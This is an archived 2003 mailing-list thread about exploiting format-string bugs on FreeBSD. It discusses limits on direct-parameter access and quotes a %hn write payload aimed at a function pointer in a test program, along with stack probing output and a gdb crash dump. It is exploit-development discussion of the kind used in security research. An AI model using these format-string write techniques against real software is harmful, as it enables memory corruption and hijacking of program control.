Re: Formatstrings on *BSD

From: The Itch (itchieat_private)
Date: Sat Jun 21 2003 - 11:23:48 PDT

Next message: eipat_private-ip.com: "Myserver 0.4.1 DOS..."

Previous message: Ingram: "Re: Formatstrings on *BSD"
In reply to: Ingram: "Re: Formatstrings on *BSD"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

You can't use direct popping or writing (%number$x) on *BSD (well only till
8 pops/writes maximum)
I dont know why this behaviour is on BSD, but it is. On linux you can have a
a direct pop/write as far as you wont.

(in your example you used %9$x)

--
-

The Itch
    -- http://www.netric.org

----- Original Message -----
From: "Ingram" <Vailat_private>
To: <vuln-devat_private>
Sent: Friday, June 20, 2003 10:07 AM
Subject: Re: Formatstrings on *BSD


> >>[%.-16457x%8$hn%.15261x%9$hn] (35)
> >>
> >^---- first question is your input still at %8$x and %9$x on the bsd box?
>
> yep, see here:
>
> > uname
> FreeBSD
> > ./vuln AAAABBBB%x%x%x%x%x%x%x%x%x
> 0 0xbfbffccc
> 1 0xbfbffcd3
> helloWorld() = 0x8048770
> accessForbidden() = 0x80487a0
>
> before : ptrf() = 0x8048770 (0xbfbffad8)
> buffer =
> [AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242]
(71)
> after : ptrf() = 0x8048770 (0xbfbffad8)
> Welcome in "helloWorld"
>
>
> >>...
> >>Segmentation fault (core dumped)
> >>
> >^---- second ... what does the bt look like in gdb...
>
> here we go, the fmt seems to corrupt eax
>
> > gdb -core vuln.core
> GNU gdb 4.18
> .
> .
> .
> This GDB was configured as "i386-unknown-freebsd".
> Core was generated by `vuln'.
> Program terminated with signal 11, Segmentation fault.
> #0  0x40517d31 in ?? ()
> (gdb) bt
> #0  0x40517d31 in ?? ()
> #1  0x8048805 in ?? ()
> #2  0x8048767 in ?? ()
> #3  0x8048561 in ?? ()
> (gdb) i reg
> eax            0x40517d31       1079082289
> ecx            0x8049a70        134519408
> edx            0x280e9968       672045416
> ebx            0x280e8424       672039972
> esp            0xbfbffad4       0xbfbffad4
> ebp            0xbfbffae0       0xbfbffae0
> esi            0x1      1
> edi            0x280e9960       672045408
> eip            0x40517d31       0x40517d31
> eflags         0x10216  66070
> cs             0x1f     31
> ss             0x2f     47
> ds             0x2f     47
> es             0x2f     47
> fs             0x2f     47
> gs             0x2f     47
> (gdb) x/1x $eax
> 0x40517d31:     Cannot access memory at address 0x40517d31.
>
>
> kind regards
> Ingram
>
> --
> +++ GMX - Mail, Messaging & more  http://www.gmx.net +++
> Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
>
>
>

Next message: eipat_private-ip.com: "Myserver 0.4.1 DOS..."
Previous message: Ingram: "Re: Formatstrings on *BSD"
In reply to: Ingram: "Re: Formatstrings on *BSD"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Jun 21 2003 - 20:42:06 PDT